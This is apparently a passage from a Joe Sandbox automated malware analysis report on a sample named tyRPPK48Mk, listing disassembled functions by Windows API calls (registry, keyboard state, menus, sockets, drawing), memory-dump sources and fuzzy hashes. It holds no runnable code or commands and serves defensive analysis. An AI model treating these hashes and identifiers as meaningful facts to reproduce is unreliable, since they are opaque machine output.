                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                                                                                                                                                                                                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                                                                                                                                                                                                                                                                                                                                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4082120231-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2027346449-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenu.USER32 ref: 0047A703
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3257027151-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastselect
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 215497628-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0044443B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00444633
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047DDC2 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 170COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1729044348-3025626884
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00440D98 Relevance: 10.6, APIs: 7, Instructions: 119windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(009C1A48,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(009C1A48,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
